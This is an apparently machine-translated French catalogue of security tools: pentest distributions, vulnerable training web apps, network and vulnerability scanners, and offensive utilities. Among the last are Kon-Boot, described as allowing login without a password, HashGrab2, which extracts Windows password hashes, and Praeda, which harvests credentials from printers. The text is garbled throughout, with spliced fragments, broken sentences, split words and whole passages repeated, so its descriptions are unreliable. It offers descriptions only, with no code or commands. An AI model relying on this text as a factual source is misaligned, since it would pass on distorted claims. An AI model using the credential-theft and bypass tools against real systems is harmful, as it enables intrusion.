Si un virus est détecté par le démon. Le démon analyse les fichiers.blanche ou liste noire et les extensions de fichier * Examiner les conclusions et d'identifier les faux positifs * Résultats à l'exportation au format XML * Écrit en Perl avec MySQL backend Agent * Fonctionne sur Windows 2000 et versions ultérieures * Ecrit en C. Le module s amba regarde simplement si une telle numérisées:. .0 depuis) et (un ou plusieurs) des démons.:. NET Framework * Fonctionne comme un service Windows à faible priorité afin que les utilisateurs ne voient pas ou se sentent * Reprend automatiquement au redémarrage du système sans interaction de l'utilisateu r * Transmettre en toute sécurité des résultats de l'application web à des intervalles défin is par l'utilisateur sur deux voies de confiance connexion SSL * PCREs utilise pour identifier les données sensibles contenues dans les fichiers * Effectuer des vérifications supplémentaires sur le potentiel de numéros de carte de crédit pour réduire les faux positifs scannedonly http://olivier. Préfixe ne sont jamais montrées à l'utilisateur et tous l'accès est refusé.

hackfromacave. Matriux http://www. * L'exécution sur un PC..com/ Le Matriux est un phénomène qui a été en attente de se produire. * Inventaire de votre réseau et PC * Surveiller et gérer votre réseau * Gérer vos actifs informatiques * Gérer les changements et des configurations Carte * Votre NetworkBETA * Audit de votre logiciel * Résoudre les problèmes de votre réseau * Exécution d'une IT Help Desk * Soyez un MSP Avantages * Parlez-lui Like You Spiceworks IT Desktop est conçu pour * Professionnels de l'informatique qui ont des droits admin sur leur réseau.http://www.com/katana. Il n'est pas nécessaire d'installer des agents sur les ordinateurs. la fissuration de passe. C'est une distribution de sécurité comprenant toutes les fonctionnalités d'un groupe de puissant.net/projects/lampsecurity/ formation LAMPSecurity est conçu pour être une série de vunlerable images de machines virtuelles ainsi que des documents complémentaires conçus pour enseigner linux. en médecine légale et pots de miel. réseau et logiciel d'inventaire pour les réseaux Windows Lansweeper est un outil de réseau automatisé de découverte qui scanne tous vos ordinat eurs et périphériques et les affiche dans une interface Web accessible facilement. SNMP. Spiceworks vous permet de . ) OS Distro Katana http://www. helpdesk.com/ Lansweeper: matériel. Linux et Unix. L'idée derrière cet outil est de rassembler toutes les dis tributions meilleure sécurité à courir à partir d'un disque USB.com/ Spiceworks est la gestion complète du réseau et de surveillance. Il découvre Windows. mais vous devez l 'exécuter à partir d'un PC sur votre réseau. LAMPSecurity http://sourceforge.html Katana est une suite de sécurité portatif multi-boot conçu pour la plupart de vos beso ins de sécurité informatique. open source . ssh .lansweeper.... d'audit.spiceworks.. OS X. Katana comprend les dis tributions qui se concentrent sur les tests de pénétration. * Organismes de moins de 500 appareils sur leur réseau. php. lansweeper http://www.matriux. tous les balay age est effectué par la norme construire-dans la fonctionnalité (WMI. Il travaillera avec plus m ais il ne sera pas aussi rapide. mysql de sécurité. apac he. inventair e PC & Logiciels solution de reporting pour gérer tout IT dans les entreprises pet ites et moyennes.

mais sans s'y limiter. «travail».et des outils gratuits qui peuvent être utilisés à des fins diverses. NST peut être utilisé comme une analyse de sécurité réseau. «banque». l'automatisation et la configuration du rés eau et applications de sécurité ont trouvé dans la distribution des NST. NST fait également un excellent outil pour aider les uns avec les scénarios de reprise sur incident dépannage et le diagnostic. Boîte à outils de sécurité réseau http://sourceforge. Par exemple. administration système e t réseau. Nous avons recueilli les outils de test du haut et les pré-installés pour c réer l'environnement idéal pour tester les applications. L'objectif principal de développer cette trousse est de f ournir à l'administrateur de sécurité réseau avec un ensemble complet d'outils Open Sour ce Network Security.pentoo.com/p/owaspbwa/wiki/Downloads Open Web Application Security Project (OWASP) Broken Applications Web du projet. une collection d'applications web vulnérable qui est distribué sur une machine virt uelle VMware au format compatible avec leur sans frais VMware Player et VMware S erver produits (ainsi que leurs produits commerciaux). Samouraï http://sourceforge. Une interface utilisateur Web de pointe (WUI) est prévu pour l'administration système. ou «AppVMs". et même sandbox de nombreux éléments au niveau du système. la médecine légale cyber enquêtes. bien sûr. «shopping». la navigation. utilisateur pe ut avoir «personnel». de sorte que leurs compromis ne portent pas atteinte à l'in tégrité du reste de la système.ch/ Qubes http://qubes-os. Qubes utilis e la technologie de virtualisation. .org/ Qubes met en œuvre la sécurité par l'approche d'isolement. des tests de sécurité analyse de la vulnérabilit et bien plus encore. d'être en mesure d'isoler les divers programme s de l'autre. bien qu'il puisse être utilisé normalement en tant que votre sy stème de bureau par défaut.net/projects/nst/ "Le Réseau Security Toolkit (NST) est un ISO bootable live CD / DVD (NST Live) et est basé sur Fedora. http://sourceforge. La trousse a été conçue pour faciliter l'accès aux best-of-breed Open Source Network Applications de sécurité et devrait fonctionner sur la plupart des p lates-formes x86/x86_64. Qubes permet à l'utilisateur de définir de nombreux domaines de la sécurité mis en place le plus léger de machines virtuelles (VM). comme sous-systèm e réseau ou de stockage. Dans le monde virtuel. et «aléatoire» AppVMs et peuvent utili pplications de l'intérieur de ces machines virtuelles. y compris. mais en même temps qu'ils sont bien isolées les une s des autres. " OWASP Web Broken projet Applications http://code.net/projects/owaspbwa/files/ Pentoo http://www. C'est une distribution conçue pour les passionnés et les profes sionnels de la sécurité. des tests de pénétration.google. ethical hacking. de validation et de suivi sur l'entreprise d'hébergement de serveurs virtuels machines virtuelles.net/projects/samurai/files/ Le Samurai Web Infrastructure de test est un LiveCD axé sur les essais d'applicati ons web. tout comme si elles étaient d 'exécution sur l'ordinateur local. Pour ce faire. Qubes prend en charge la copie-coller et le partage de fichiers en tre les AppVMs.

à condition VMware) Les cibles incluent: * * * * * OWASP WebGoat v5.6. car il n 'a pas besoin d'une connexion réseau. Outils + Objectifs = Dojo Qu'est-ce? Divers outils web application des tests de sécurité et des applications web vulnérable s ont été ajoutés à une installation propre de Ubuntu v9.WeakNet Linux http://weaknetlabs. sans aucune connaissance du mot de passe. il permet d'entrer un mo t de passe profil protégé.outils.6 Hacme Casino v1.57 betasqlmap * v0.php Dojo de sécurité Web Un logiciel open-source autonome de formation pour les applications Web des test s de pénétration de sécurité.7 * Utiles Firefox add-ons Kon-Boot http://www. Pourquoi? Le Web Security Dojo est pour apprendre et pratiquer les techniques de web app t ests de sécurité.0 Les objectifs de formation simple par Maven de sécurité (y compris REST et JSON) Outils: * Burp Suite (version gratuite) v1.0 OWASP InsecureWebApp v1.com/main/ "Un must-have pour quiconque s'intéresse à la sécurité ou la médecine légale.0. Pratique image machine virtuelle (VirtualBox a recommandé.com/dojo. cette distribu tion de CD-entreprises contient tous les outils dont vous avez besoin de tester vos compétences et d'exceller dans le domaine de l'INFOSEC.0 RC1 OWASP Dirbuster * Paros v3.net/projects/agnitiotool/ . Il est idéal pour les classes de formation et de conférences.mavensecurity.Johnny Long (iHackC harities.2 Damn Vulnerable Web App v1.3 * W3af version cvs * OWASP Skavengerv0.com/all/kon-boot/ Kon-Boot est une pièce prototype de logiciel qui permet de modifier le contenu d'u n noyau linux (et maintenant aussi le noyau Windows!) À la volée (pendant le démarrage ).13 * WebScarab v20070504-1631 * Ratproxy v1. et de la documentation. Le Dojo contient tout le nécessaire pour comme ncer .org) Dojo de sécurité Web http://www.2a * V1. Pour les systèmes Windows. D'autres Agnitio http://sourceforge.piotrbania.2. Dans l'état actuel." .10. il compilation permet de connecter à un système Linux en tant q ue l'utilisateur «root» sans avoir à taper le mot de passe ou d'élever les privilèges de l 'utilisateur actuel à la racine. des objectifs.

net/index. de créer une piste d'audit et de reporting. Buck de sécurité a été conçu exactement pour cela.net/projects/agnitiotool/ Un outil pour aider les développeurs et professionnels de la sécurité d'emploi effectu er des examens code de sécurité d'une manière cohérente et reproductible.html La base Fuzzing cadre (BFF) se compose de deux parties principales: * Une machine virtuelle Linux qui a été optimisé pour fuzzing * Un ensemble de scripts et un fichier de configuration qui orchestrent la cours e fuzzing La machine virtuelle est une installation stripped-down Debian avec les modifica tions suivantes: * Le gestionnaire de fenêtre Fluxbox est utilisé à la place de la lourde Gnome ou envi ronnements de bureau KDE. Agnitio vise à r emplacer la nature ad hoc de la sécurité d'emploi révision du code de la documentation . Le but de Buck de sécurité est. A présent. Caractéristiques * * * * Le code de sécurité critiques Mesures de sécurité l'examen du code et des rapports La sécurité des applications code outil d'examen Conseils de sécurité statique analyse et de reporting Buck sécurité http://buck-security. En tant qu'administrateur système linux .mais aussi comm e un utilisateur linux normal . Il exécute des tests importants et renvoie les résultats à vous au bout de quelques minutes. de créer une piste d'audit et de reporting. Il a été conçu pour serveurs Debian et Ubuntu.on se demande si votre système est sécurisé.sourceforge. il est utile d'avoir une overvirew de l'état de sécurité du système immédiate ment. mais peut être utile pour n'importe quel système Linux.html Buck de sécurité est une collection de contrôles de sécurité pour Linux. Agnitio vise à r emplacer la nature ad hoc de la sécurité d'emploi révision du code de la documentation . les tests suivants sont mis en œuvre: * * * * * * * * Recherche de fichiers worldwriteable Recherche de répertoires worldwriteable Recherche des programmes où le setuid est fixé Recherche des programmes où le setgid est fixé Vérifier votre umask Vérifiez si le sticky-bit est activé pour le répertoire / tmp Recherche de super-utilisateurs Recherche des outils d'attaque les paquets installés Cadre CERT Fuzzing de base http://www. Dans cett e situation. . * Fluxbox est configuré pour ne pas faire ou de se concentrer de nouvelles fenêtres.org/download/bff/d. Agnitio http://sourceforge. pour vous permettre d'obtenir un aperçu rapide de l'état de sécurité de votre système.Un outil pour aider les développeurs et professionnels de la sécurité d'emploi effectu er des examens code de sécurité d'une manière cohérente et reproductible. Cela peut aider dans des situations où vous pourriez avoir besoin pour interagir avec le système d'exploitation invité tout une application GUI est fuzzed.cert.

* Mémoire de randomisation est désactivé. le nombre de fonctionnalités. * Bande est un lien symbolique vers / bin / true. Il a été choisi pou r son comportement déterministe.Caractéristiques * * * * Le code de sécurité critiques Mesures de sécurité l'examen du code et des rapports La sécurité des applications code outil d'examen Conseils de sécurité statique analyse et de reporting Buck sécurité http://buck-security. mais peut être utile pour n'importe quel système Linux. qui permet à l'OS invité à partager un répertoire avec l'hôte.net/index.html La base Fuzzing cadre (BFF) se compose de deux parties principales: * Une machine virtuelle Linux qui a été optimisé pour fuzzing * Un ensemble de scripts et un fichier de configuration qui orchestrent la cours e fuzzing La machine virtuelle est une installation stripped-down Debian avec les modifica tions suivantes: * Le gestionnaire de fenêtre Fluxbox est utilisé à la place de la lourde Gnome ou envi ronnements de bureau KDE.on se demande si votre système est sécurisé. * Fluxbox est configuré pour ne pas faire ou de se concentrer de nouvelles fenêtres. * Le système d'exploitation est configuré pour ouvrir automatiquement une session et commencer à X.cert. En tant qu'administrateur système linux .org/download/bff/d. ce qui empêche les symboles d'être retirée lorsque l'application est construite. Le but de Buck de sécurité est. Cela peut aider dans des situations où vous pourriez avoir besoin pour interagir avec le système d'exploitation invité tout une application GUI est fuzzed. A présent. et la taille légère.sourceforge. Le fuzzer utilisé par l'ODR est l'application de zzuf Sam Hocevar. Il a été conçu pour serveurs Debian et Ubuntu.mais aussi comm e un utilisateur linux normal . * sudo est configuré pour ne pas demander un mot de passe. Il exécute des tests importants et renvoie les résultats à vous au bout de quelques minutes. il est utile d'avoir une overvirew de l'état de sécurité du système immédiate ment. .html Buck de sécurité est une collection de contrôles de sécurité pour Linux. les tests suivants sont mis en œuvre: * * * * * * * * Recherche de fichiers worldwriteable Recherche de répertoires worldwriteable Recherche des programmes où le setuid est fixé Recherche des programmes où le setgid est fixé Vérifier votre umask Vérifiez si le sticky-bit est activé pour le répertoire / tmp Recherche de super-utilisateurs Recherche des outils d'attaque les paquets installés Cadre CERT Fuzzing de base http://www. Buck de sécurité a été conçu exactement pour cela. Dans cett e situation. * VMware Tools est installé. pour vous permettre d'obtenir un aperçu rapide de l'état de sécurité de votre système.

En d'autres termes. et éviter ces vulnérabilités communes et d'autres bugs qui ont un impact sur la sécurité. Fierce est un scr ipt Perl qui scanne rapidement domaines (généralement en quelques minutes.appspot. Watcher. ce n'est pas un ou til de DDoS. Caractéristiques: crunch * génère des listes de mots dans les deux sens combinaisons et permutations * Il peut produire la rupture par le nombre de lignes ou de taille du fichier * A maintenant reprendre appui * modèle prend désormais en charge nombre et symboles * modèle prend désormais en charge les caractères majuscules et minuscules séparément * Ajoute un rapport de situation lors de la génération des fichiers multiples Féroce http://ha. réparer. Fierce est un outil de reconnaissance. Jarlsberg http://jarlsberg.crise peut générer toutes les combinai sons et permutations possibles. attaques de phis hing navigateur ou l'exécution de code à distance. HashGrab2 http://forum. après quoi il les écrit dans le réper toire d'utilisateur spécifié. Il est destiné spécifiquement pour localiser des cibles pro bables à l'intérieur et l'extérieur d'un réseau d'entreprise.ckers.html HashGrab2 monte automatiquement tous les lecteurs Windows. qui montre comment les vulnérabilités des app lications Web peuvent être exploitées et comment se défendre contre ces attaques.Croquer http://sourceforge. Fiddler. Aucune exploitation est effect uée (sauf si vous faites quelque chose intentionnellement malveillants communiquer avec le commutateur-). des biscuits. il n'est pas conçu pour analyser l'ensemble d'Internet ou d'effectuer des attaques non ciblées. puis il vous permet de lui-même attaquer avec ces attaques! C'est ainsi que les mains sur l'apprentissage devrait être! Google aime à décrire comme Jarlsberg une application web de fromage qui a été intention nellement construit avec un certain nombre de vulnérabilités. AJAX. Python (car il est écrit en Python). Le seul pré-requis est q ue vous devez avoir une connaissance globale de fonctionnement d'une application Web et une certaine connaissance de HTML. Seuls les objectifs sont énu mérés (à moins que le commutateur nopattern-est utilisé). telles que le déni de service. des modèles. Fierce n'est pas un scanner IP. etc dans vos efforts. il peut trouver. il enseigne d 'abord comment vous le piratage des œuvres. injection SQL. en suppos ant qu'aucun lag réseau) en utilisant plusieurs tactiques. Il v ous donne une brève description sur une vulnérabilité et puis vous avez la tâche d'explo iter cette vulnérabilité! Aussi simple que ça! Vous êtes autorisé à utiliser vos outils favo ris tels que Burp Proxy. Il peut aussi vous apprendre à trouver. etc Vous jouez le rôle d'un hacker dans ce test. la divulgation d'informations. .intern0t.org/fierce/ Premièrement ce n'est pas féroce. comme cross-site vulnérabilités scripting (XSS) et la falsification de Cro ss-Site Request (XSRF).com/ Jarlsberg est une collection de codes.net/hacking-tools-utilities/2538-hashgrab-py-automatically -get-windows-login-hashes.net/projects/crunch-wordlist/ Crunch est un générateur de liste de mots où vous pouvez spécifier un jeu de caractères st andard ou un jeu de caractères que vous spécifiez. Il p eut vous apprendre à attaquer une application en utilisant les failles de sécurité com mune web. et e n utilisant des extraits samdump2 hachages nom d'utilisateur-mot de passe de SAM et SYSTEM fichiers situés sur le lecteur Windows.

La principale nouveauté est le mode de permutations qui prend chaque mot dans la l iste et il se combine avec les autres pour produire toutes les permutations poss ibles (pas de combinaisons. Ainsi. ainsi qu'une li ste de noms d'utilisateurs potentiels très utile pour préparer une attaque bruteforc e sur les services ouverts comme ftp. pop3. vous pouvez le deviner OS. ods) disponibles dans la cible d e sites Web aux victimes. Toutes ces informations ne devraient pas être disponibles sur le net. etc En outre. ppt. doc.com/rsmangler-security-tool. et la plupart d'entre eux ne connaissent pas cette information existe. RSMangler http://www. à cause de c ela. etc Cette nouvelle version extraits adresse MAC à partir de documents Microsoft Office . odp. partage des ressources .php RSMangler aura une liste de mots et d'effectuer diverses manipulations sur les a nalogues à ceux effectués par John the Ripper avec quelques extras. VPN. Maintenant vous pouvez avoir une idée de quel type de matériel qu'ils utilisent. pour les questions).foundstone. avec cette information. nous recommandons fortement avec le mode de permutations activé (par défaut) qu e vous utilisez une liste de mots très faible. vous pouvez leur montrer quelles sont les informations à un attaquant peut obteni r.. . Il va générer une page html avec les résultats des méta-données extraites. Par exemple. applications web. va produire la liste suivante: freds frais poissons fredsfresh fredsfish freshfreds freshfish fishfreds fishfresh fredsfreshfish fredsfishfresh freshfredsfish freshfishfreds fishfredsfresh fishfreshfreds Chacun de ces nouveaux mots est ensuite soumis à la calandres d'autres.MetaGooFil http://www. xls.randomstorm. les noms de réseau. VIDigger http://www. le freds mots. 3 mots commencent créer une liste fin ale contenant 4245 mots et 5 mots commencent crée une liste contenant 91975.php Metagoofil est un outil de collecte d'information conçu pour extraire les métadonnées des documents publics (pdf. poi sson frais.com/us/resources/proddesc/vidigger. mais la plup art des entreprises ne disposent pas de politiques sur la fuite d'informations .edge-security.com/metagoofil. il sera extrait de la liste des communiqués chemins dans les métadonnées. avec cette technique simple. nous avons essayé avec quelques centaines de mots et a abandonné lorsque le fich ier de sortie obtenu à la 3G. En te st.htm .

Utilisé pour la CEI initiatives de référence . sara http://www-arc. 3. injections SQL. Effectuer des tests exhaustifs XSS Peut s'adapter à de nombreux environnements de pare-feu. En fait. 4. si un e application de test vulnérables est nécessaire dans l'évaluation d'un scanner de sécur ité Internet ou un pare-feu d'applications Web. la LEP 7. Linux. 7. les utilisateurs. Vicnum peut facilement être invoquée et adaptés pour répondre à un besoin spécifique. vous pouvez contrôler une applicatio n Web cible pour voir ce que le scanner peut trouver et ce que le pare-feu peut protéger. Vicnum http://sourceforge. Support à distance de soi et des installations de numérisation API. Bien que la technologie de base de VMwa re est conçu pour être sécurisé. LEP: 1. Fonctionne sous Unix. l'objectif majeur de ce projet est de renforcer la sécurité des applicat ions web en éduquant les différents groupes (étudiants. VIDigger est destiné à être utilisé tout au long du cycle de vie du déploiement à la fois comme un outil de durcissement et un outil de suivi des mo difications des paramètres de configuration qui apporte des changements à l'attentio n de l'administrateur. VIDigger permettra de récupérer les données de configuration sur les machines hôtes et v irtuels.VIDigger est un outil conçu pour aider les administrateurs de l'infrastructure vir tuelle VMware durcir leur environnement. la gestion. Par exemple. c'est OK pour s'amuser un peu. SARA 7. VIDigger est conçu pour aider les administrateurs à vérifier la configuration du serveur ESX et les machines virtuelles hébergées sur le serveur ESX contre le guide VMware Infrastructure de trempe et d'autres pratique s exemplaires. tels que par cross site scripting. Finalement. L'outil axé sur les changements qui peuvent influer sur la sécurité globale de l'hôte ESX ou d'une machine virtuelle (s) déployé sur le serveur ESX.com/sara/ Le vérificateur de sécurité assistante de recherche (LEP) est un réseau de troisième générati n analyse de la sécurité outil qui a été disponible et activement mis à jour depuis plus d e 10 ans. 2. et les quest ions de gestion de session. les vérificateurs) quant à ce qui pourrait mal se passer dans une ap plication web.9. Effectuer des essais d'injection SQL.1 est notre dernière version. Intègre la base de données nationales sur la vulnérabilité (NVD).net/projects/vicnum/ Vicnum est une application Web flexible et vulnérables qui démontre des problèmes comm uns de sécurité Web. il ya de nombreux paramètres de configuration et de déploie ment des considérations qui peuvent gravement affecter la sécurité globale du déploiemen t de l'infrastructure virtuelle. 6. puis de remettre un rapport personnalisable de domaines problématiques à l' administrateur Virtual. les développeurs. MAC OS / X ou Windows (par coLinux) OS. Le programme est particulièrement utile pour vérificateu rs en TI de perfectionner leurs compétences de sécurité Web et la création de "capture d u drapeau" des exercices de type.9. 5. Etre une petite application web sans cadre complexes qui se posent. toutes les bonnes choses doivent venir à sa fin et il en va de la LEP.2a est l a version finale. Et bien sûr.Malheureusement. Une des caractéristiques les plus intéressantes de VIDigger est qu'il peut être étendu p our ajouter de nouveaux contrôles que de nouveaux composants sont ajoutés à l'infrastr ucture virtuelle pas actuellement analysés par l'outil.

CHScanner seulement d'écouter l e trafic réseau et décode les paquets reçus. Il ne scanne seulement les adresses IPv4. scriptable. à partir de la couche 2 du modèle OSI. * Mode Hunt: introduit avec la version 0. à partir d'un fichier pcap Xplico extraits de chaque e-mail (POP. * CHScanner a beaucoup plus de méthodes de balayage par rapport à beaucoup d'autres scanners. IGMP. Free-utilisation ouverte SATAN licence orientée xplico http://www. * Le mode passif: dans ce mode NO paquet est envoyé. elle utilise aussi ARP. * Automatique.2. TCP SYN. TFTP. FTP. Caractéristiques automatique (scriptable) mode de fonctionnement . Modes de numérisation * Le mode Normal: c'est le mode commun utilisé par la plupart des scanners aujourd 'hui. un mode passif et le mode de balayage normal. sauvegarder le résultat et fermer. module de recherche d'entreprise 11. CHScanner va faire son travail basé sur le fichier de configura tion fourni comme l'un des paramètres. Plug-in installation pour les applications de tiers 9.xplico. des protocoles. En utilisant les données de géolocalisation fournies par MaxMind vous pouvez trouver le pays associé à une adresse IPv4 spécifiques. dans ce mode CHScanner va scanne r tout hôte qui tente de communiquer avec la machine hôte. . CHScanner peut être utilisé en ligne de com mande pour automatiser les scans.9. * Outre l'interface skinnable graphique. tous les contenus HTTP. IPv4 et IPv6 scanner réseau avec 31 méthodes de numérisation: il scanne les ports ouverts.org/ Le but de Xplico est extrait d'un trafic Internet de saisir les données des applic ations contenues. les informations SNMP et WMI (WBEM) d'information. Autonome ou en mode daemon 12. chaque appel VoIP (SIP).com/p/chscanner/ CHScanner est un ARP. Certains détails Les principales différences entre CHScanner et d'autres outils similaires sont: CHScanner * utiliser un système d'exploitation Mimic technologie. Xplico est une sourc e ouverte Network Forensic Analysis Tool (NFAT). un mode de chasse. et assez rapide. ICMP Echo R equest. Scanner CHScanner http://code. Le balayage est déclenché par l'un a reçu des paquets suivants destinés à la machine locale: requête ARP.7.8. informations NetBIOS et les parts de Windows. par des paramètres de ligne de commande. semblable à un sniffer. la numérisation se fait sur la base des fichiers de configur ation utilisateur défini. Par exemple. * Il est très flexible. et ainsi de suite. IMA P et SMTP). SNMP et WMI. Xplico n'est pas un analyseur de protocole réseau.google. normes CVE soutien 10. mode: si l'instruction de sorte. IPv6 et certains protocoles de niveau supérie ur comme NetBIOS. Il ont également la po ssibilité d'activer (en utilisant le Wake-On-LAN) et à l'arrêt ou le redémarrage d'un hôte distant Windows.

6 du noyau Linux (Fedora Core base) Solaris 8 OpenSolaris (Nevada 35) Il ya aussi un "random" mode où les paquets sont les données d'identification aléatoir e généré.Utiliser le gestionnaire de paquet WinPcap. Il peut utiliser une d es deux méthodes pour y parvenir: . nom s d'utilisateur et mots de passe. les noms d'hôtes. XP SP3 et Vista ne paquets sortants de toute nature sont c apturés.mcafee. mais est plutôt orientée vers la découverte de l'infrastructure et des do nnées utiles liées à la sécurité du réseau. .4 (Adamantix base) 2. Limitations Outre les exigences précitées de fonctionner sous un compte de niveau administrateur .Sur Windows XP SP1. exigences de l'outil CSniffer fonctionne sur les systèmes Microsoft Windows (Windows 2000 vers le haut) et tente de renifler les données réseau en mode promiscuous.com/products/tools/csniffer/csniffer. seuls les paquets UDP sont capturés. Ces données peu ent révéler toutes sortes d'informations utiles.paquets TCP ne sont pas capturés. Actue llement.Utilisation de Windows "Built-in raw sockets API (par défaut). . . il existe certaines limitations sévères lors de l'utilisation intégrée dans Windows so ckets mode brut.Sous Windows Vista avec SP1. cela signifie que les paquets envoyés émule le comportement des di fférents systèmes d'exploitation et / ou de leurs outils natifs (où est le cas). les routeurs et les serveurs de noms. Le Solaris 8 émulation ne peut être poursuivi et d'émulation pour OpenSolaris (Nev ada 35) peut être ajouté. spécifiques SP). Une liste complète de toutes les limites connues vu sur différents systèmes d'exploita tion Windows et les niveaux de service pack de ces systèmes d'exploitation n'a pas été compilée. Silex . cela ne s'applique qu'à Windows sockets mode brut.exe Cet outil agit comme un sniffer réseau Ethernet standard. des systèmes IPv6. contrairement à un paquet sniffer traditionnels ne pas tenter de capturer et de décoder l'ensembl e du trafic. Toutefois. souvent de la circulation n'est pas envoyé vers o depuis le réseau du système hôte à savoir diffusion générale la circulation. mais voici quelques problèmes connus. il émule les suivantes: * * * * * * Windows XP Professionnel SP2 Windows Server 2003 Linux noyau 2. CSniffer http://download. Les premières prises de Microsoft API a plusieurs restrictions qui ont été introduites au fil des années dans un effort pour réduire les risques de sécurité associés à l'accès à f le niveau des paquets réseau.Système d'exploitation Mimic brève description de la technologie Fondamentalement. allant des systèmes en direct sur le réseau. . Encore une fois.Sortant UDP et ICMP ne sont pas capturés (OS.Selon la plate-forme que vous utilisez sur vous pouve z constater que vous êtes limités dans ce que les données peuvent être vus sur le réseau.

Il faut quelques instants pour Flint pour évaluer un ensemble de règ les et erreurs place. Tout le monde fait des erreurs. l'empêchant de bloqu er les attaques. * Contrôle laxiste des DMZ peut exposer les serveurs de préparation et de test. économiser du temps et permet à votre équipe de se concent rer sur des problèmes d'ingénierie qui importent vraiment. Ain si. puis vous devez penser comme un pare-feu ne. Pour comprendre une configuration de pare-feu. Qu'est-ce qu'on peut faire avec Flint Vérifier les règles avant son déploiement dans LES Flint empêche ingénieurs de faire des e rreurs coûteuses.microsoft. de sorte que vous pouvez voir en un coup d'oeil ce que n'importe quel pare-feu donnée est fait. Flint pouvez repérer les règl es redondantes et contradictoires. calcule rapidement l'effet de toutes les règles de con figuration. Pare-feu peuvent sortir de l'étape avec les politiques. COMPREHEND configurations complexes Flint ne suffit de cocher les pare-feu pour les problèmes. Flint est fai ble traînée. Pourquoi vous avez besoin Flint Vous avez plusieurs pare-feu protégeant les réseaux internes de l'Internet et de con trôler l'accès aux données des clients.aspx?FamilyID=1283b765-f57d-4ebb-8 f0a-c49c746b44b9&displaylang=en&pf=true # Présentation La surface d'attaque Analyzer est le même outil utilisé par les équipes de Microsoft d u produit intérieur aux changements catalogue apportées au système d'exploitation de l 'installation de nouveaux logiciels. Il a également comprend parfaitement le sens des lignes de configurat ion.com/downloads/en/details. et ainsi de faire vot re pare-feu.http://runplaybook. Votre entreprise change. et les décompose pour vous par service ou par l'interface. Analyseur Microsoft surface d'attaque http://www. Votre équipe peut-elle et en quelques minutes. * REDONDANT règles pare-feu peut être compliqué votre configuration et vous ralentir. il est plus facile de détecter les pr oblèmes au niveau des entreprises. Comment obtenir Flint Flint est distribué sous forme de source. et pas toujours dans le même temps. v ous devez lire des centaines de lignes de configuration. Analyseur de la surface d'attaque prend un instantané de votre état du système avant e . vous pouvez: * CLEAN UP CONFIGURATIONS RUSTY qui sont crudded avec des règles qui ne peuvent pa s correspondre à la circulation. Certaines de ces err eurs peuvent coûter cher: * L'INSÉCURITÉ SERVICES pourrait être autorisé à traverser le pare-feu. CLEAN UP Ensembles de règles RUSTY Flint ne le dur travail de décapage des règles de p are-feu pour crud inutiles. * ÉLIMINER LATENTE PROBLEMES DE SECURITE tapi dans des règles trop permissives * SANITY Vérifier les modifications pour voir si de nouvelles règles de créer des prob lèmes. Les gens ne sont pas bonnes à penser comme les pare-feu. et Flint. * FIREWALL ports de gestion peuvent être exposés à des réseaux non sécurisés. pas de drame.com/p/11 Flint examine les pare-feu. la plupart des pare-feu sont truffées de fautes subtiles. Il est mis en œuvre dans le rubis. puis des taches tant de problèmes.

php/Netbios-shares-scanner Netbios Actions scanner a été développé par SecPoint.iniqua. adresses e-mail. nous sommes en mesure de récolter une mine d'informations à partir de périp hériques MFP y compris les noms d'utilisateurs. carnet d'adresses des utilisateurs. L'outil analyse une adresse IP et tente de récupérer les disques partagés et de leur contenu. la vérification de configuration.t après l'installation du produit (s) et affiche les changements à un certain nombre d'éléments clés de la surface d'attaque de Windows. Il peut analyser une URL unique ou d'effectuer une analyse fondée sur les résultats indexés par Google.aldeid.net/?p=223 En tirant parti de sécurité de l'imprimante pauvres et vulnérables au cours de tests d e pénétration.Nessus scanners peuvent être distribués dans toute l'entreprise.Les développeurs de visualiser les changements de la surface d'attaque résultant d e l'introduction de leur code sur la plate-forme Windows .com/index.1 est une mise à jour mineure pour ajouter le support pour Window s 7 et Windows Server 2008 R2.1. En outre affiche CVE code associé à chaque plugin. Ceci permet: . de numérisation des copies! Certaines installations i . avec la découverte à grande vitesse.foofus. MBSA 2. à l'intérieur DMZ et à travers les réseaux physiquement séparés. Plecost http://www.net/?page_id=218 http://www. mot s de passe LDAP. si. Praeda http://www.com/downloads/details. ils pourraient aussi vous aider dans la récupération à d istance de gravures. Il travaille pour les post es de travail Windows / serveurs ainsi que pour les boîtes Linux (smbclient utilisé pour la connexion).IT Security Incident intervenants d'acquérir une meilleure compréhension de l'état d 'un des systèmes de sécurité au cours des enquêtes (si un scanner de base a été prise du sys tème au cours de la phase de déploiement) Microsoft Baseline Security Analyzer http://www. y compris les informations d'authentification SMB. de fax.nessus. Email. etc Parfois. le profilage d'actifs.foofus.com/labs/plecost/ Wordpress doigt imprimante outil de recherche et de récupérer des informations sur l es versions des plugins installés dans les systèmes de Wordpress.Les professionnels pour évaluer la surface d'attaque globale changement par l'in stallation de la ligne de l'organisation des applications d'entreprise .aspx?FamilyID=b1e76bbe-71df-41e8-8b52 -c871d012ba78&displaylang=en Le Microsoft Baseline Security Analyzer fournit une méthode rationalisée pour identi fier les mises à jour de sécurité manquantes et les erreurs de configuration de sécurité c ommune.org/nessus/ Le scanner de vulnérabilité Nessus ® est le leader mondial de scanners active. Netbios-part-scanner http://www.IT comptes de sécurité d'évaluer le risque d'un morceau particulier de logiciel inst allé sur la plate-forme Windows au cours des examens du risque de menace .microsoft. Nessus http://www. la découverte des données sensibles et analyse de la vulnérabilité de votre posture de sécurité.

RIPS automatise le processus d'identification des failles de sécurité potentielles d ans le code source PHP en utilisant d'analyse statique de code source.Marquer les lignes vulnérables dans la visionneuse de code source . Caractéristiques du RIPS: . LFI / RFI. praeda est conçu pour automatiser une partie de la collecte d'info rmations provenant des appareils de réseau à travers des interfaces web de gestion t els que les imprimantes et les appareils du réseau. hautement optimisé la gestion HTTP.Code de la fonction définie par l'utilisateur par passage de la souris sur appel détecté . l'application web de reconnaissance active outil de sécurité. Co mparer les résultats de l'analyse en cours avec l'analyse précédente et rapport sur le delta.(entrée de l'utilisateur) relié à la visionneuse de code source .Créer des exploits CURL pour les vulnérabilités détectées en quelques clics .La seule exigence minimale est un serveur web local avec PHP et d'un navigateu r Seccubus http://sourceforge. vulnérabilités RCE et plus .google. dans une interface web.net/projects/seccubus/ Outil pour déclenche automatiquement des balayages de sécurité réguliers avec Nessus.La liste de toutes les fonctions définies par l'utilisateur et les points d'entrée du programme . Cet outil open source est programmé en Perl et dispose de plusieurs modules qui po rtent sur près de 28 appareils en tout! Le module à utiliser est énuméré des différents modèl s d'imprimantes utilisant des «Page de titre» et «Type de serveur" les réponses de la pa ge de gestion d'imprimante.7 syntaxe différente soulignant schéma de couleur .com/p/skipfish/ Entièrement automatisé.net/projects/rips-scanner/ RIPS est un analyseur statique de code source pour les vulnérabilités dans PHP webap plications.mprimante peut également 